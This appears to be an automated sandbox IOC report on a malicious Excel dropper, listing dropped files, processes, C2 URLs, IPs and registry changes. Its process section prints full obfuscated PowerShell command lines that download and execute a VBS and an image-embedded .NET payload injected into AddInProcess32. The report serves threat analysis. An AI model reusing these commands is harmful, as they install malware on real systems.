IOC Report
Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsx

loading gif

Files

File Path
Type
Category
Malicious
Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsx
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Jul 2 08:19:03 2024, Security: 1
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\EvengIEcache[1].hta
HTML document, ASCII text, with very long lines (65498), with CRLF line terminators
modified
malicious
C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\eveningfiledatinglover.vBS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\~$Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsx
data
modified
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\eveningfiledatinglover[1].vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48B4810C.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2E31577.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Temp\1vaomz5u.ft1.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\RESC2C3.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Jul 3 16:03:32 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\cboglgly\CSC66221087E6254F6E92E0F9138CFEC2C1.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (333)
dropped
C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\n1no2lop.boj.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\pibo52rt.udq.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\z52cpx5v.dul.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\~DF9497146B9A365AE9.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Temp\~DFD2A101440BB1BACA.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFE45887675C4B6D5D.TMP
data
dropped
C:\Users\user\Desktop\46930000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jul 3 17:03:51 2024, Security: 1
dropped
C:\Users\user\Desktop\46930000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\Desktop\Cuentas bancarias y cdigo ##Swift incorrecto.xla.xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jul 3 17:03:51 2024, Security: 1
dropped
There are 15 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" "/C poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.cmdline"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningfiledatinglover.vBS"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC2C3.tmp" "c:\Users\user\AppData\Local\Temp\cboglgly\CSC66221087E6254F6E92E0F9138CFEC2C1.TMP"

URLs

Name
IP
Malicious
http://91.92.254.194/imge/new-image_v.jpg
91.92.254.194
malicious
http://198.46.178.144/madamwebbbbbbbas6444.txt
198.46.178.144
malicious
http://91.92.254.194
unknown
malicious
http://198.46.178.144/eveningfiledatinglover.vbs
198.46.178.144
malicious
http://198.46.178.144/EvengIEcache.hta
198.46.178.144
malicious
http://nuget.org/NuGet.exe
unknown
http://198.46.178.144/EvengIEcache.hta...e
unknown
http://hop.fyi/ppltLl
unknown
https://account.dyn.com/
unknown
http://crl.entrust.net/server1.crl0
unknown
http://ocsp.entrust.net03
unknown
http://hop.fyi/ppltLT8
unknown
http://hop.fyi/ppltLh
unknown
http://91.92.254.194/imge/new-image_v.jpgxRm;
unknown
http://198.46.178.144/EvengIEcache.htax
unknown
http://hop.fyi/ppltLP8
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://198.46.178.144
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
http://hop.fyi/ppltL
192.185.89.92
http://198.46.178.144/EvengIEcache.hta6o
unknown
http://198.46.178.144/f
unknown
http://go.micros
unknown
http://198.46.178.144/j
unknown
http://198.46.178.144/eveningfiledatinglover.vbst
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
http://198.46.178.144/EvengIEcache.hta...
unknown
http://198.46.178.144/eveningfiledatinglover.vbsp
unknown
http://198.46.178.144/EvengIEcache.htaZ
unknown
http://hop.fyi/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://ip-api.com
unknown
http://hop.fyi/ppltLB
unknown
http://198.46.178.144/EvengIEcache.hta/
unknown
http://94.156.65.247/Users_API/negrocock/file_mq5uppna.ldt.txt
unknown
http://198.46.178.144/EvengIEcache.htaC:
unknown
http://198.46.178.144/eveningfiledatinglover.vbstt
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.comodo.com/CPS0
unknown
http://198.46.178.144/EvengIEcache.htahttp://198.46.178.144/EvengIEcache.hta0
unknown
http://198.46.178.144/eveningfil
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://go.cr
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 38 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ip-api.com
208.95.112.1
malicious
hop.fyi
192.185.89.92

IPs

IP
Domain
Country
Malicious
208.95.112.1
ip-api.com
United States
malicious
198.46.178.144
unknown
United States
malicious
94.156.65.247
unknown
Bulgaria
malicious
91.92.254.194
unknown
Bulgaria
malicious
192.185.89.92
hop.fyi
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
`-
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
bg-
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3ACF2
3ACF2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
FileDirectory
There are 58 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
402000
remote allocation
page execute and read and write
malicious
1241D000
trusted library allocation
page read and write
malicious
164000
heap
page read and write
7FE89C40000
trusted library allocation
page read and write
7FE89A57000
trusted library allocation
page read and write
1AF5E000
stack
page read and write
325000
heap
page read and write
7FE89AB0000
trusted library allocation
page execute and read and write
2DB000
stack
page read and write
1BF0000
heap
page read and write
4E9D000
heap
page read and write
4E80000
heap
page read and write
446000
heap
page read and write
40D000
heap
page read and write
3509000
heap
page read and write
413000
heap
page read and write
7FE89A80000
trusted library allocation
page execute and read and write
2371000
trusted library allocation
page read and write
3434000
heap
page read and write
34BA000
heap
page read and write
3421000
heap
page read and write
43A5000
heap
page read and write
34C2000
heap
page read and write
2311000
trusted library allocation
page read and write
375000
heap
page read and write
7FE89C50000
trusted library allocation
page read and write
4395000
heap
page read and write
7FE89960000
trusted library allocation
page execute and read and write
3B1000
heap
page read and write
272F000
stack
page read and write
43B3000
heap
page read and write
1C33A000
heap
page read and write
50D5000
heap
page read and write
3C90000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
1C69E000
stack
page read and write
3449000
heap
page read and write
123BD000
trusted library allocation
page read and write
4AF0000
trusted library allocation
page read and write
49C000
heap
page read and write
2510000
trusted library allocation
page read and write
10000
heap
page read and write
34EF000
heap
page read and write
104000
heap
page read and write
3E9E000
heap
page read and write
152000
trusted library allocation
page read and write
1A5FD000
stack
page read and write
7FE89C20000
trusted library allocation
page read and write
3B3C000
stack
page read and write
4F8000
heap
page read and write
3B8000
stack
page read and write
1A5A5000
heap
page read and write
34B8000
heap
page read and write
40B000
heap
page read and write
102000
heap
page read and write
2A99000
trusted library allocation
page read and write
310000
trusted library allocation
page read and write
2E38000
trusted library allocation
page read and write
7FE89AA4000
trusted library allocation
page read and write
3EBF000
stack
page read and write
296000
stack
page read and write
7FE898C4000
trusted library allocation
page read and write
3445000
heap
page read and write
5B8000
trusted library allocation
page read and write
342A000
heap
page read and write
2F0000
trusted library section
page read and write
50B5000
heap
page read and write
3509000
heap
page read and write
34C1000
heap
page read and write
1B124000
heap
page read and write
4DE0000
heap
page read and write
1AA18000
stack
page read and write
20D000
heap
page read and write
34F9000
heap
page read and write
1231F000
trusted library allocation
page read and write
3675000
trusted library allocation
page read and write
1A66F000
heap
page read and write
34ED000
heap
page read and write
2E36000
trusted library allocation
page read and write
7FE89A7C000
trusted library allocation
page read and write
49C000
heap
page read and write
3451000
heap
page read and write
364D000
trusted library allocation
page read and write
4780000
heap
page read and write
4D0C000
stack
page read and write
39A5000
heap
page read and write
4E6000
heap
page read and write
42E0000
heap
page read and write
5800000
heap
page read and write
7FE89C30000
trusted library allocation
page read and write
7FE89AF0000
trusted library allocation
page read and write
34FD000
heap
page read and write
34BA000
heap
page read and write
1A99C000
stack
page read and write
492000
heap
page read and write
2BF1000
trusted library allocation
page read and write
34B3000
heap
page read and write
2E14000
trusted library allocation
page read and write
1B016000
heap
page read and write
710000
trusted library allocation
page read and write
394F000
stack
page read and write
7FE89AA4000
trusted library allocation
page read and write
3D0000
trusted library allocation
page execute and read and write
1C6EE000
stack
page read and write
22F0000
heap
page execute and read and write
609000
heap
page read and write
134000
trusted library allocation
page read and write
37A0000
trusted library allocation
page read and write
34C7000
heap
page read and write
354000
heap
page read and write
2465000
trusted library allocation
page read and write
130000
trusted library allocation
page read and write
4F6000
heap
page read and write
7FE89AB0000
trusted library allocation
page read and write
3F0000
trusted library allocation
page read and write
34B8000
heap
page read and write
3497000
heap
page read and write
34FD000
heap
page read and write
7FE89980000
trusted library allocation
page execute and read and write
7FE89986000
trusted library allocation
page execute and read and write
7FE89A60000
trusted library allocation
page read and write
230E000
stack
page read and write | page guard
20000
heap
page read and write
4E2000
heap
page read and write
120000
trusted library allocation
page read and write
478000
heap
page read and write
1D20000
direct allocation
page read and write
439F000
heap
page read and write
392000
heap
page read and write
4E2000
heap
page read and write
1A870000
heap
page execute and read and write
7FE89C90000
trusted library allocation
page read and write
7FE898DB000
trusted library allocation
page read and write
1D07000
direct allocation
page read and write
1BF4000
heap
page read and write
34B8000
heap
page read and write
39A0000
heap
page read and write
1C333000
heap
page read and write
260000
heap
page read and write
34C7000
heap
page read and write
1DCB000
heap
page read and write
1C3F6000
heap
page read and write
34B5000
heap
page read and write
396000
heap
page read and write
495000
heap
page read and write
604000
heap
page read and write
34FE000
heap
page read and write
12D000
heap
page read and write
7FE898B0000
trusted library allocation
page read and write
3FB0000
heap
page read and write
3C3000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
23BE000
trusted library allocation
page read and write
34ED000
heap
page read and write
7FE898C2000
trusted library allocation
page read and write
43B3000
heap
page read and write
40E000
heap
page read and write
49C000
heap
page read and write
1E0000
trusted library allocation
page read and write
7FE8991C000
trusted library allocation
page execute and read and write
379E000
stack
page read and write
7FE89A5C000
trusted library allocation
page read and write
34C1000
heap
page read and write
4F6000
heap
page read and write
484000
heap
page read and write
34AF000
heap
page read and write
493000
heap
page read and write
1F8000
heap
page read and write
4E4000
heap
page read and write
1C560000
heap
page read and write
34CD000
heap
page read and write
1BF95000
heap
page read and write
202000
heap
page read and write
34B1000
heap
page read and write
1AD52000
heap
page read and write
5A8E000
stack
page read and write
160000
heap
page read and write
4360000
heap
page read and write
34AF000
heap
page read and write
335000
heap
page read and write
3424000
heap
page read and write
43B7000
heap
page read and write
7FE89BD0000
trusted library allocation
page read and write
1F80000
direct allocation
page read and write
130000
trusted library allocation
page read and write
341C000
heap
page read and write
34AF000
heap
page read and write
7FE89A77000
trusted library allocation
page read and write
1A7C0000
heap
page execute and read and write
480000
heap
page read and write
1AFDF000
stack
page read and write
4F6000
heap
page read and write
43E000
remote allocation
page execute and read and write
3BF000
heap
page read and write
1B2EF000
stack
page read and write
CDE000
stack
page read and write
3900000
heap
page read and write
491000
heap
page read and write
22E000
heap
page read and write
34F9000
heap
page read and write
16D000
heap
page read and write
10000
heap
page read and write
34E0000
heap
page read and write
1C3CF000
stack
page read and write
46C000
heap
page read and write
1C3E2000
heap
page read and write
479E000
stack
page read and write
34F9000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
31F000
heap
page read and write
442000
heap
page read and write
485000
heap
page read and write
4CB0000
heap
page read and write
46D000
heap
page read and write
4AF0000
trusted library allocation
page read and write
25A4000
heap
page read and write
34BA000
heap
page read and write
478000
heap
page read and write
7FE89B50000
trusted library allocation
page read and write
4FE000
heap
page read and write
478000
heap
page read and write
7FE89C36000
trusted library allocation
page read and write
7FE89B70000
trusted library allocation
page read and write
1FD3000
direct allocation
page read and write
3CB4000
heap
page read and write
1C19F000
stack
page read and write
350B000
heap
page read and write
3431000
trusted library allocation
page read and write
43B7000
heap
page read and write
2D28000
trusted library allocation
page read and write
2BF7000
trusted library allocation
page read and write
3B8000
heap
page read and write
2F5A000
stack
page read and write
1C3B7000
heap
page read and write
7FE89A70000
trusted library allocation
page execute and read and write
34E6000
heap
page read and write
3290000
trusted library allocation
page execute
